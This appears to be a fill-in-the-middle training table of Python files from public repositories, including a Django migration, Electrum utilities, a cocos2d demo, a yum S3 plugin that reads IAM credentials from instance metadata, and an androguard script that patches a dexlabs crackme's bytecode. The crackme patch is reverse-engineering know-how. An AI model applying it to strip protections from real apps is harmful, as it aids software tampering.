| repo_name (string, 5-100 chars) | path (string, 4-231 chars) | language (1 class) | license (15 classes) | size (int64, 6-947k) | score (float64, 0-0.34) | prefix (string, 0-8.16k chars) | middle (string, 3-512 chars) | suffix (string, 0-8.17k chars) |
|---|---|---|---|---|---|---|---|---|
awyrough/xsoccer | xsoccer/eventstatistics/migrations/0005_auto_20170112_2009.py | Python | mit | 461 | 0 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-01-12 20:09
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('eventstatistics', '0004_auto_20170112_2007'),
]
operations = [
migrations.RenameField(
model_name='eventstatistic',
old_name='relative_time',
                new_name='relative_seconds',
            ),
]
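A usage sketch for the migration above (illustrative, not part of the sample): in a configured Django project that contains this app, the rename is applied through the migration runner.
from django.core.management import call_command
call_command("migrate", "eventstatistics")  # app label taken from the sample above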
Crypto-Expert/Electrum-obsolete | lib/util.py | Python | gpl-3.0 | 5,928 | 0.009447 | import os, sys, re, json
import platform
import shutil
from datetime import datetime
is_verbose = True
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def print_json(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
sys.stdout.write(s + "\n")
sys.stdout.flush()
def user_dir():
if "HOME" in os.environ:
return os.path.join(os.environ["HOME"], ".electrum")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum")
elif 'ANDROID_DATA' in os.environ:
return "/sdcard/electrum/"
else:
#raise Exception("No home directory found in environment variables.")
return
def appdata_dir():
"""Find the path to the application data directory; add an electrum folder and return path."""
if platform.system() == "Windows":
return os.path.join(os.environ["APPDATA"], "Electrum")
elif platform.system() == "Linux":
return os.path.join(sys.prefix, "share", "electrum")
elif (platform.system() == "Darwin" or
platform.system() == "DragonFly" or
platform.system() == "NetBSD"):
return "/Library/Application Support/Electrum"
else:
raise Exception("Unknown system")
def get_resource_path(*args):
return os.path.join(".", *args)
def local_data_dir():
"""Return path to the data folder."""
assert sys.argv
prefix_path = os.path.dirname(sys.argv[0])
local_data = os.path.join(prefix_path, "data")
return local_data
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from decimal import Decimal
s = Decimal(x)
sign, digits, exp = s.as_tuple()
digits = map(str, digits)
while len(digits) < decimal_point + 1:
digits.insert(0,'0')
digits.insert(-decimal_point,'.')
s = ''.join(digits).rstrip('0')
if sign:
s = '-' + s
elif is_diff:
s = "+" + s
p = s.find('.')
s += "0"*( 1 + num_zeros - ( len(s) - p ))
if whitespaces:
s += " "*( 1 + decimal_point - ( len(s) - p ))
s = " "*( 13 - decimal_point - ( p )) + s
return s
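# Worked example for format_satoshis (illustrative, not in the original file):
#   format_satoshis(1234567) == "0.01234567"
# The digits are left-padded to decimal_point + 1 places, a decimal point is
# inserted decimal_point places from the right, and trailing zeros are stripped.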
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds ago" % remainder
if distance_in_seconds < 40:
return "half a minute ago"
elif distance_in_seconds < 60:
return "less than a minute ago"
else:
return "1 minute ago"
else:
if distance_in_minutes == 0:
return "less than a minute ago"
else:
return "1 minute ago"
elif distance_in_minutes < 45:
return "%s minutes ago" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour ago"
elif distance_in_minutes < 1440:
return "about % | d hours ago" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day ago"
    elif distance_in_minutes < 43200:
return "%d days ago" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month ago"
elif distance_in_minutes < 525600:
return "%d months ago" % | (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year ago"
else:
return "over %d years ago" % (round(distance_in_minutes / 525600))
# URL decode
_ud = re.compile('%([0-9a-fA-F]{2})', re.MULTILINE)  # hex digits are 0-9a-f
urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_url(url):
url = str(url)
o = url[8:].split('?')
address = o[0]
if len(o)>1:
params = o[1].split('&')
else:
params = []
amount = label = message = signature = identity = ''
for p in params:
k,v = p.split('=')
uv = urldecode(v)
if k == 'amount': amount = uv
elif k == 'message': message = uv
elif k == 'label': label = uv
elif k == 'signature':
identity, signature = uv.split(':')
url = url.replace('&%s=%s'%(k,v),'')
else:
print k,v
return address, amount, label, message, signature, identity, url
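# Illustrative call (assumes an 8-character scheme prefix such as "bitcoin:",
# which is what url[8:] strips; example values are the editor's, not the file's):
#   parse_url("bitcoin:1BoatSLRHtKNngkdXEeobR76b53LETtpyT?amount=0.5&label=tip")
# returns that address, amount "0.5", label "tip", and empty message/signature.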
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import __builtin__
builtin_raw_input = __builtin__.raw_input
__builtin__.raw_input = raw_input
etingof/pysmi | pysmi/searcher/base.py | Python | bsd-2-clause | 405 | 0 | #
# This file is part of pysmi software.
#
# Copyright (c) 2015-2020, Ilya Etingof <etingof@gmail.com>
# License: http://snmplabs.com/pysmi/license.html
#
class AbstractSearcher(object):
def setOptions(self, **kwargs):
        for k in kwargs:
setattr(self, k, kwargs[k])
return self
def fileExists(self, mibname, mtime, rebuild=False):
raise NotImplementedError()
egustafson/sandbox | Python/py-setup/ex_pkg1/__init__.py | Python | apache-2.0 | 110 | 0.036364 | #!/usr/bin/env python
print("Example package 1 in ex_pkg1/*")
## Local Variables:
## mode: python
## End:
caspervg/pylex | src/pylex/lot.py | Python | mit | 4,510 | 0.001996 | from base64 import b64encode
import os
import requests
from .route import Route
class LotRoute(Route):
"""
Contains endpoints related to LEX lots
"""
def lot(self, id, user=True, dependencies=True, comments=True, votes=True, no_strip=False):
"""
Retrieve the lot with given identifier
:param id: Identifier of the lot to retrieve
:param user: Should user (authenticated) information be returned (e.g. last_downloaded)
:param dependencies: Should a dependency list be returned
:param comments: Should a list of comments be returned
:param votes: Should a list of votes be returned
:param no_strip: Should XML/HTML tags be stripped in the returned lot description
:return: Requested lot
:rtype: dict
"""
args = {}
if user:
args['user'] = 'true'
        if dependencies:
args['dependencies'] = 'true'
if comments:
args['comments'] = 'true'
if votes:
args['votes'] = 'true'
if no_strip:
args['nostrip'] = 'true'
        return self._get_json('lot/{0}', id, **args)
def all(self):
"""
Retrieve a concise list of all available lots
:return: List of all lots
:rtype: list
"""
return self._get_json('lot/all')
def download(self, id, directory):
"""
Download the file with given identifier to the given directory
:param id: Identifier of the lot to download
:param directory: Directory where the downloaded ZIP should be stored
:return: None
"""
url = (self._base + 'lot/{0}/download').format(id)
r = requests.get(url, auth=self._auth, stream=True)
file_name = r.headers['Content-Disposition'].split('"')[-2]
if len(directory) < 1:
return
with open(os.path.join(directory, file_name), 'wb') as file:
for chunk in r.iter_content(chunk_size=1024):
if chunk:
file.write(chunk)
file.flush()
def add(self, id):
"""
Add the lot with given identifier to the user's download (later) list
:param id: Identifier of the lot to add to the list
:return: None
"""
self._get('lot/{0}/download-list', id)
def rate(self, id, comment=None, vote=None):
"""
Add a rating (vote and/or comment) to the lot with given identifier
:param id: Identifier to add the rating to
:param comment: String with the comment to add. It should have len > 0 when entered.
:param vote: int with the vote to add. It should be greater than 0 and smaller than 4 when entered.
:return: Which elements were uploaded (list of 'rating' and/or 'comment')
:rtype: list
"""
rating = {}
if vote is not None:
if 1 <= vote <= 3:
rating['rating'] = vote
if comment is not None:
if len(comment) > 0:
rating['comment'] = comment
url = self._base + 'lot/{0}/comment'.format(id)
r = requests.post(url, auth=self._auth, params=rating)
r.raise_for_status()
return r.json()
def set_dependencies(self, id, internal=list(), external=list()):
"""
Sets the dependency string (for the LEX Dependency Tracker) for a lot.
Requires administrator access.
:param id: Identifier of the lot
:param internal: List of dependency identifiers for internal files (LEX lots) that the lot depends on
:param external: List of (name, link) tuples for external files (STEX, TSC, ...) that the lot depends on
:return: Created dependency string that was sent to the server, in plaintext and base64 encoded
:rtype: str
"""
dependency_str = 'NONE'
if len(internal) > 0 or len(external) > 0:
deps = internal
for (name, link) in external:
deps.append("{0}@{1}".format(name, link))
dependency_str = '$'.join(str(x) for x in deps)
params = {
'string': b64encode(dependency_str.encode('ascii'))
}
url = self._base + 'lot/{0}/dependency-string'.format(id)
r = requests.put(url, auth=self._auth, params=params)
r.raise_for_status()
return {
'plain': dependency_str,
'encoded': params['string']
}
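# Illustrative input/output for the '$'-joined dependency string built above
# (editor's example; the pack name and URL are hypothetical, no request made):
#   internal=[1, 2], external=[('SomePack', 'http://example.org/pack')]
#   -> plain string '1$2$SomePack@http://example.org/pack'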
jessedsmith/Arcte | modules/containers.py | Python | gpl-3.0 | 23,623 | 0.021297 | # -*- coding: utf-8 -*-
import os
import numpy as n
from collections import OrderedDict
from vtk import *
from qt4 import *
class Structure:
'''
Base class for all crystal baseStructs
'''
def __init__(self):
self.natoms = 0
self.composition = ''
self.system = ""
self.bravais = ""
self.schoenflies = ""
self.strukt = ""
self.herm_maug = ""
self.pearson = ""
self.number = 0
self.atom_coords = OrderedDict()
self.primitive_vectors = {}
self.volume = 0
self.reciprocal_vectors = {}
self.latt_basis_vectors = {}
self.name = ''
class BrailleWidget:
def __init__(self):
self.cyl = None
self.text = None
self.btext = None
self.dots = None
self.test = None
self.center = []
self.pt2 = []
self.radius = None
self.vect = []
self.uvect = []
self.dotsTransform=None
self.widgetText = ''
self.actors = []
self.sRadScale = 0.214
self.dRadScale = 0.162
self.trans = vtkTransform()
self.xrot = None
self.yrot = None
self.zrot = None
self.translateCenter = None
self.translateOffset = None
self.anDict = {'a':self.ary([[0,0]]),
'b':self.ary([[0,0],[1,0]]),
'c':self.ary([[0,0],[0,1]]),
'd':self.ary([[0,0],[0,1],[1,1]]),
'e':self.ary([[0,0],[1,1]]),
'f':self.ary([[0,0],[0,1],[1,0]]),
'g':self.ary([[0,0],[0,1],[1,0],[1,1]]),
                       'h':self.ary([[0,0],[1,0],[1,1]]),
                       'i':self.ary([[0,1],[1,0]]),
'j':self.ary([[1,0],[0,1],[1,1]]),
'k':self.ary([[0,0],[2,0]]),
'l':self.ary([[0,0],[1,0],[2,0]]),
'm':self.ary([[0,0],[0,1],[2,0]]),
'n':self.ary([[0,0],[0,1],[1,1],[2,0]]),
                       'o':self.ary([[0,0],[1,1],[2,0]]),
                       'p':self.ary([[0,0],[0,1],[1,0],[2,0]]),
'q':self.ary([[0,0],[0,1],[1,0],[1,1],[2,0]]),
'r':self.ary([[0,0],[1,0],[1,1],[2,0]]),
's':self.ary([[0,1],[1,0],[2,0]]),
't':self.ary([[0,1],[1,0],[1,1],[2,0]]),
'u':self.ary([[0,0],[2,0],[2,1]]),
'v':self.ary([[0,0],[1,0],[2,0],[2,1]]),
'w':self.ary([[0,1],[1,0],[1,1],[2,1]]),
'x':self.ary([[0,0],[0,1],[2,0],[2,1]]),
'y':self.ary([[0,0],[0,1],[1,1],[2,0],[2,1]]),
'z':self.ary([[0,0],[1,1],[2,0],[2,1]])}
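        # Illustrative: self.ary([[0,0],[1,0]]) (the 'b' entry above) returns
        # the 3x2 cell with dots 1 and 2 raised:
        #   [[1., 0.],
        #    [1., 0.],
        #    [0., 0.]]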
self.uDict = {'a':"⠁",
'b':'⠃',
'c':'⠉',
'd':'⠙',
'e':'⠑',
'f':'⠋',
'g':'⠛',
'h':'⠓',
'i':'⠊',
'j':'⠚',
'k':'⠅',
'l':'⠇',
'm':'⠍',
'n':'⠝',
'o':'⠕',
'p':'⠏',
'q':'⠟',
'r':'⠗',
's':'⠎',
't':'⠞',
'u':'⠥',
'v':'⠧',
'w':'⠺',
'x':'⠭',
'y':'⠽',
'z':'⠵'}
sPos = n.sin(n.radians(45)) - self.sRadScale
dPosX = n.sin(n.arctan(4/3)) - self.dRadScale
dPosY = n.cos(n.arctan(4/3)) - self.dRadScale
self.sCharPos = n.array([[[-sPos , sPos],[sPos , sPos]],
[[-sPos , 0],[sPos , 0]],
[[-sPos , -sPos],[sPos , -sPos]]])
self.dCharPos = n.array([[[-dPosX,dPosY],[-dPosX/3.,dPosY],[dPosX/3.,dPosY],[dPosX,dPosY]],
[[-dPosX,0],[-dPosX/3.,0],[dPosX/3.,0],[dPosX,0]],
[[-dPosX,-dPosY],[-dPosX/3.,-dPosY],[dPosX/3.,-dPosY],[dPosX,-dPosY]]])
def ary(self,ones):
array = n.zeros((3,2))
for i in ones:
array[i[0],i[1]] = 1
return array
def setCenter(self,x,y,z):
self.center = n.array([x,y,z])
def setPt2(self,vals):
x = (vals[1] + vals[0])/2.
y = (vals[3] + vals[2])/2.
z = (vals[5] + vals[4])/2.
dist = n.sqrt((self.center[0]-x)**2 + (self.center[1]-y)**2 + (self.center[2]-z)**2)
self.uvect = n.array([x-self.center[0],y-self.center[1],z-self.center[2]])/dist
self.vect = self.uvect*self.radius*1.05
self.pt2 = self.center+self.vect
def setRadius(self,rad):
self.radius = rad
def setText(self,text):
self.text = text.strip()
def rotateX(self,rot):
self.xrot.SetElement(1, 1, n.cos(n.radians(-rot)))
self.xrot.SetElement(1, 2, n.sin(n.radians(-rot)))
self.xrot.SetElement(2, 1, -n.sin(n.radians(-rot)))
self.xrot.SetElement(2, 2, n.cos(n.radians(-rot)))
self.dots.Update()
self.cyl.Update()
def rotateY(self,rot):
self.yrot.SetElement(0,0,n.cos(n.radians(-rot)))
self.yrot.SetElement(0,2,-n.sin(n.radians(-rot)))
self.yrot.SetElement(2,0,n.sin(n.radians(-rot)))
self.yrot.SetElement(2,2,n.cos(n.radians(-rot)))
self.dots.Update()
self.cyl.Update()
def rotateZ(self,rot):
self.zrot.SetElement(0,0,n.cos(n.radians(-rot)))
self.zrot.SetElement(0,1,n.sin(n.radians(-rot)))
self.zrot.SetElement(1,0,-n.sin(n.radians(-rot)))
self.zrot.SetElement(1,1,n.cos(n.radians(-rot)))
self.dots.Update()
self.cyl.Update()
def setupCylinder(self):
if self.center.any() and self.radius and self.pt2.any():
line = vtkLineSource()
line.SetPoint1(self.center[0], self.center[1], self.center[2])
line.SetPoint2(self.pt2[0],self.pt2[1],self.pt2[2])
line.Update()
tube = vtkTubeFilter()
tube.SetRadius(self.radius*0.95)
tube.SetNumberOfSides(25)
tube.CappingOn()
tube.SetInputConnection(line.GetOutputPort())
tube.Update()
tri = vtkTriangleFilter()
tri.SetInputConnection(tube.GetOutputPort())
tri.Update()
self.cyl = tri
        else:
            print "Center, radius, or second point not specified."
def setupDots(self):
self.dots = vtkAppendPolyData()
if len(self.text) == 1:
lRad = self.radius*0.95*self.sRadScale
array = self.radius*0.95*self.sCharPos
letArray = self.anDict[self.text.lower()]
array[:,:,0] *= letArray
array[:,:,1] *= letArray
for i,j in array:
if vtkVersion.GetVTKVersion() < 6.0:
if i[0] or i[1]:
self.dots.AddInput(self.addDot(i, lRad).GetOutput())
if j[0] or j[1]:
self.dots.AddInput(self.addDot(j, lRad).GetOutput())
self.btext = self.uDict[self.text.lower()].decode("utf-8")
                elif vtkVersion.GetVTKVersion() >= 6.0:
if i[0] or i[1]:
self.dots.AddInputData(self.addDot(i, lRad).GetOutput())
if j[0] or j[1]:
self.dots.AddInputData(self.addDot(j, lRad).GetOutput())
self.btext = self.uDict[self.text.lower()].decode("utf-8")
if len(self.text) == 2:
lRad = self.radius*0.95*self.dRadScale
array = self.radius*0.95*self.dCharPos
            let1 = self.a
shadowmint/nwidget | lib/cocos2d-0.5.5/samples/demo_flag3d.py | Python | apache-2.0 | 7,097 | 0.014231 | #
# cocos2d:
# http://cocos2d.org
#
# An example of how to generate a 3D scene manually
# Of course, the easiest way is to execute an Waves3D action,
# but this example is provided to show the
# 'internals' of generating a 3D effect.
#
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
import pyglet
from pyglet.gl import *
import cocos
from cocos.director import director
from cocos.euclid import Point2,Point3
import math
class Flag3D( cocos.layer.Layer ):
def __init__( self ):
super(Flag3D,self).__init__()
# load the image
self.image = pyglet.resource.image('flag.png')
# get the texture
self.texture = self.image.get_texture()
# get image size
x,y = self.image.width, self.image.height
# size of the grid: 20 x 20
        # The image will be split into 20 x 20 tiles
self.grid_size = Point2(20,20)
# size of each tile
self.x_step = x / self.grid_size.x
self.y_step = y / self.grid_size.y
# calculate vertex, textures depending on image size
idx_pts, ver_pts_idx, tex_pts_idx = self._calculate_vertex_points()
# Generates an indexed vertex array with texture, vertex and color
# http://www.glprogramming.com/red/chapter02.html#name6
        self.vertex_list = pyglet.graphics.vertex_list_indexed( (self.grid_size.x+1) * (self.grid_size.y+1),
idx_pts, "t2f", "v3f/stream","c4B")
self.vertex_list.vertices = ver_pts_idx # vertex points
self.vertex_list.tex_coords = tex_pts_idx # texels
self.vertex_list.colors = (255,255,255,255) * (self.grid_size.x+1) * (self.grid_size.y+1) # colors
# call the "step" method every frame when the lay | er is active
self.schedule(self.step)
def on_enter(self):
super(Flag3D,self).on_enter()
# hook on resize to override the default projection with a custom one.
# cocos2d's default projetion is also a 3d projection, but since this
# is a demo, we show how to customize our own on_resize method.
director.push_handlers(self.on_resize)
# the layer is on "stage"
self.elapsed = 0
def on_resize( self, width, height ):
# change the 2D projection to 3D
glViewport(0, 0, width, height)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(90, 1.0*width/height, 0.1, 400.0)
glMatrixMode(GL_MODELVIEW)
def draw( self ):
super(Flag3D,self).draw()
glLoadIdentity()
# center the image
glTranslatef(-320, -240, -320.0)
# enable texture
glEnable(self.texture.target)
glBindTexture(self.texture.target, self.texture.id)
# draw the vertex array
self.vertex_list.draw(GL_TRIANGLES)
# disable the texture
glDisable(self.texture.target)
def step( self, dt ):
# move the z vertices with the sin(x+y) function
# to simulate a 3D flag effect
self.elapsed += dt
amplitud = 32
for i in range(0, self.grid_size.x+1):
for j in range(0, self.grid_size.y+1):
x,y,z = self.get_vertex(i,j)
z = (math.sin(self.elapsed*math.pi*2 + (y+x) * .01) * amplitud)
self.set_vertex( i,j, (x, y, z) )
def _calculate_vertex_points(self):
# generate the vertex array with the correct values
# size of the texture (power of 2)
w = float(self.image.width)/self.texture.tex_coords[3]
h = float(self.image.height)/self.texture.tex_coords[7]
index_points = []
vertex_points_idx = []
texture_points_idx = []
# generate 2 empty lists:
# vertex_list:
        # texel_list:
for x in range(0,self.grid_size.x+1):
for y in range(0,self.grid_size.y+1):
vertex_points_idx += [-1,-1,-1]
texture_points_idx += [-1,-1]
# since we are using vertex_list_indexed we must calculate
# the index points
for x in range(0, self.grid_size.x):
for y in range(0, self.grid_size.y):
x1 = x * self.x_step
x2 = x1 + self.x_step
y1 = y * self.y_step
y2 = y1 + self.y_step
# d <-- c
# ^
# |
# a --> b
a = x * (self.grid_size.y+1) + y
b = (x+1) * (self.grid_size.y+1) + y
c = (x+1) * (self.grid_size.y+1) + (y+1)
d = x * (self.grid_size.y+1) + (y+1)
# we are generating 2 triangles: a-b-d, b-c-d
# (and not 1 quad, to prevent concave quads
# although this example can work OK with quads)
index_points += [ a, b, d, b, c, d]
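                # e.g. the first cell (x=0, y=0) on the 20x20 grid gives
                # a=0, b=21, c=22, d=1 -> triangles (0, 21, 1) and (21, 22, 1)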
l1 = ( a*3, b*3, c*3, d*3 )
l2 = ( Point3(x1,y1,0), Point3(x2,y1,0), Point3(x2,y2,0), Point3(x1,y2,0) )
# populate the vertex list
for i in range( len(l1) ):
vertex_points_idx[ l1[i] ] = l2[i].x
vertex_points_idx[ l1[i] + 1 ] = l2[i].y
vertex_points_idx[ l1[i] + 2 ] = l2[i].z
tex1 = ( a*2, b*2, c*2, d*2 )
tex2 = ( Point2(x1,y1), Point2(x2,y1), Point2(x2,y2), Point2(x1,y2) )
# populate the texel list
for i in range( len(l1) ):
texture_points_idx[ tex1[i] ] = tex2[i].x / w
texture_points_idx[ tex1[i] + 1 ] = tex2[i].y / h
return ( index_points, vertex_points_idx, texture_points_idx )
def set_vertex( self, x, y, v):
'''Set a vertex point is a certain value
:Parameters:
`x` : int
x-vertex
`y` : int
y-vertex
`v` : (int, int, int)
tuple value for the vertex
'''
idx = (x * (self.grid_size.y+1) + y) * 3
self.vertex_list.vertices[idx] = v[0]
self.vertex_list.vertices[idx+1] = v[1]
self.vertex_list.vertices[idx+2] = v[2]
def get_vertex( self, x, y):
'''Get the current vertex point value
:Parameters:
`x` : int
x-vertex
`y` : int
y-vertex
:rtype: (int,int,int)
'''
idx = (x * (self.grid_size.y+1) + y) * 3
x = self.vertex_list.vertices[idx]
y = self.vertex_list.vertices[idx+1]
z = self.vertex_list.vertices[idx+2]
return (x,y,z)
if __name__ == '__main__':
director.init()
# enable depth test
director.set_depth_test()
s = cocos.scene.Scene()
s.add( Flag3D() )
director.run( s )
jakbob/guitarlegend | songbuilder.py | Python | gpl-3.0 | 1,430 | 0.01958 | import getopt
import sys
import midi
#constants
keycodes = {1 : 64, #midi keycodes
2 : 59,
3 : 55,
4 : 50,
5 : 45,
6 : 40,
            -1 : -1,} #flag for deletion
def rearange(infile, outfile):
#read infile
mid = midi.MidiFile()
mid.open(infile)
mid.read()
mid.close()
#rearange notes
for track in mid.tracks:
for event in track.events:
if event.type == "SEQUENCE_TRACK_NAME":
event.data = str(event.channel)
if hasattr(event, "pitch"):
for string, code in keycodes.iteritems():
if event.pitch >= code:
if code == -1:
del event #perhaps it helps...
else:
event.channel = string
event.track = string
break
#if event.channel == -1:
            # track.events.remove(event)
#write new file
mid.open(outfile, "wb")
mid.write()
mid.close()
if __name__ == "__main__":
infile = outfile = None
optlist, args = getopt.getopt(sys.argv[1:], "i:o:")
for flag, value in optlist:
if flag == "-i":
            infile = value
elif flag == "-o":
outfile = value
if not (infile and outfile):
raise "Must specifile infile (-i) and outfile (-o)"
    rearange(infile, outfile)
mardix/pylot | pylot/app_templates/default/__init__.py | Python | mit | 8 | 0.125 |
# Pylot
mbrossard/yum-s3-iam | s3iam.py | Python | apache-2.0 | 9,027 | 0.000111 | #!/usr/bin/env python
# Copyright 2012, Julius Seporaitis
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = "Julius Seporaitis"
__email__ = "julius@seporaitis.net"
__copyright__ = "Copyright 2012, Julius Seporaitis"
__license__ = "Apache 2.0"
__version__ = "1.0.1"
import urllib2
import urlparse
import time
import hashlib
import hmac
import json
import yum
import yum.config
import yum.Errors
import yum.plugins
from yum.yumRepo import YumRepository
__all__ = ['requires_api_version', 'plugin_type', 'CONDUIT',
'config_hook', 'prereposetup_hook']
requires_api_version = '2.5'
plugin_type = yum.plugins.TYPE_CORE
CONDUIT = None
def config_hook(conduit):
yum.config.RepoConf.s3_enabled = yum.config.BoolOption(False)
yum.config.RepoConf.key_id = yum.config.Option()
yum.config.RepoConf.secret_key = yum.config.Option()
def prereposetup_hook(conduit):
"""Plugin initialization hook. Setup the S3 repositories."""
repos = conduit.getRepos()
for repo in repos.listEnabled():
if isinstance(repo, YumRepository) and repo.s3_enabled:
new_repo = S3Repository(repo.id, repo.baseurl)
new_repo.name = repo.name
# new_repo.baseurl = repo.baseurl
new_repo.mirrorlist = repo.mirrorlist
new_repo.basecachedir = repo.basecachedir
new_repo.gpgcheck = repo.gpgcheck
new_repo.gpgkey = repo.gpgkey
new_repo.key_id = repo.key_id
new_repo.secret_key = repo.secret_key
new_repo.proxy = repo.proxy
new_repo.enablegroups = repo.enablegroups
if hasattr(repo, 'priority'):
new_repo.priority = repo.priority
if hasattr(repo, 'base_persistdir'):
new_repo.base_persistdir = repo.base_persistdir
if hasattr(repo, 'metadata_expire'):
new_repo.metadata_expire = repo.metadata_expire
if hasattr(repo, 'skip_if_unavailable'):
new_repo.skip_if_unavailable = repo.skip_if_unavailable
repos.delete(repo.id)
repos.add(new_repo)
class S3Repository(YumRepository):
"""Repository object for Amazon S3, using IAM Roles."""
def __init__(self, repoid, baseurl):
super(S3Repository, self).__init__(repoid)
self.iamrole = None
self.baseurl = baseurl
self.grabber = None
self.enable()
@property
def grabfunc(self):
raise NotImplementedError("grabfunc called, when it shouldn't be!")
@property
def grab(self):
if not self.grabber:
self.grabber = S3Grabber(self)
if self.key_id and self.secret_key:
self.grabber.set_credentials(self.key_id, self.secret_key)
else:
self.grabber.get_role()
self.grabber.get_credentials()
return self.grabber
class S3Grabber(object):
def __init__(self, repo):
"""Initialize file grabber.
Note: currently supports only single repo.baseurl. So in case of a list
only the first item will be used.
"""
if isinstance(repo, basestring):
self.baseurl = repo
else:
if len(repo.baseurl) != 1:
raise yum.plugins.PluginYumExit("s3iam: repository '%s' "
"must have only one "
"'baseurl' value" % repo.id)
else:
self.baseurl = repo.baseurl[0]
# Ensure urljoin doesn't ignore base path:
if not self.baseurl.endswith('/'):
self.baseurl += '/'
def get_role(self):
"""Read IAM role from AWS metadata store."""
request = urllib2.Request(
urlparse.urljoin(
"http://169.254.169.254",
"/latest/meta-data/iam/security-credentials/"
))
response = None
try:
response = urllib2.urlopen(request)
self.iamrole = (response.read())
finally:
if response:
response.close()
def get_credentials(self):
"""Read IAM credentials from AWS metadata store.
Note: This method should be explicitly called after constructing new
object, as in 'explicit is better than implicit'.
"""
request = urllib2.Request(
urlparse.urljoin(
urlparse.urljoin(
"http://169.254.169.254/",
"latest/meta-data/iam/security-credentials/",
), self.iamrole))
response = None
try:
response = urllib2.urlopen(request)
data = json.loads(response.read())
finally:
if response:
response.close()
self.access_key = data['AccessKeyId']
self.secret_key = data['SecretAccessKey']
self.token = data['Token']
def set_credentials(self, access_key, secret_key):
self.access_key = access_key
self.secret_key = secret_key
self.token = None
def _request(self, path):
url = urlparse.urljoin(self.baseurl, urllib2.quote(path))
request = urllib2.Request(url)
if self.token:
request.add_header('x-amz-security-token', self.token)
signature = self.sign(request)
request.add_header('Authorization', "AWS {0}:{1}".format(
self.access_key,
signature))
return request
def urlgrab(self, url, filename=None, **kwargs):
"""urlgrab(url) copy | the file to the local filesystem."""
request = self._request(url)
if filename is None:
| filename = request.get_selector()
if filename.startswith('/'):
filename = filename[1:]
response = None
try:
out = open(filename, 'w+')
response = urllib2.urlopen(request)
buff = response.read(8192)
while buff:
out.write(buff)
buff = response.read(8192)
except urllib2.HTTPError, e:
# Wrap exception as URLGrabError so that YumRepository catches it
from urlgrabber.grabber import URLGrabError
new_e = URLGrabError(14, '%s on %s' % (e, url))
new_e.code = e.code
new_e.exception = e
new_e.url = url
raise new_e
finally:
if response:
response.close()
out.close()
return filename
def urlopen(self, url, **kwargs):
"""urlopen(url) open the remote file and return a file object."""
return urllib2.urlopen(self._request(url))
def urlread(self, url, limit=None, **kwargs):
"""urlread(url) return the contents of the file as a string."""
return urllib2.urlopen(self._request(url)).read()
def sign(self, request, timeval=None):
"""Attach a valid S3 signature to request.
request - instance of Request
"""
date = time.strftime("%a, %d %b %Y %H:%M:%S GMT", timeval or time.gmtime())
request.add_header('Date', date)
host = request.get_host()
# TODO: bucket name finding is ugly, I should find a way to support
# both naming conventions: http://bucket.s3.amazonaws.com/ and
# http://s3.amazonaws.com/bucket/
try:
pos = host.find(".s3")
assert pos != -1
bucket = host[:pos]
except AssertionError:
raise yum.plugins.PluginYumExit(
"s3iam: baseurl hostname should be in format: "
code4bones/androguard | demos/crackme_dexlabs_patch.py | Python | apache-2.0 | 1,566 | 0.028736 | #!/usr/bin/env python
import sys
PATH_INSTALL = "./"
sys.path.append(PATH_INSTALL)
from androguard.core.bytecodes import dvm
from androguard.core.bytecodes import apk
from androguard.core.analysis import analysis
from androguard.core import androconf
class Nop(dvm.Instruction10x):
def __init__(self):
self.OP = 0x00
def patch_dex( m ):
for i in m.get_methods():
if i.get_class_name() == "Lorg/dexlabs/poc/dexdropper/DropActivity;":
print i.get_class_name(), i.get_name()
patch_method_3( i )
# or
# patch_method_X( i )
def patch_method_1( method ):
buff = method.get_code().get_bc().insn
buff = "\x00" * 0x12 + buff[0x12:]
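    # 0x12 == 18 bytes; a Dalvik nop is a 2-byte unit, so this blanks the
    # first 9 instructions (matching the 9 nops in patch_method_2/3 below)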
method.get_code().get_bc().insn = buff
def patch_method_2( method ):
method.set_code_idx( 0x12 )
instructions = [ j for j in method.get_instructions() ]
for j in range(0, 9):
instructions.insert(0, Nop() )
method.set_instructions( instructions )
def patch_method_3( method ):
method.set_code_idx( 0x12 )
instructions = [ j for j in method.get_instructions() ]
for j in range(0, 9):
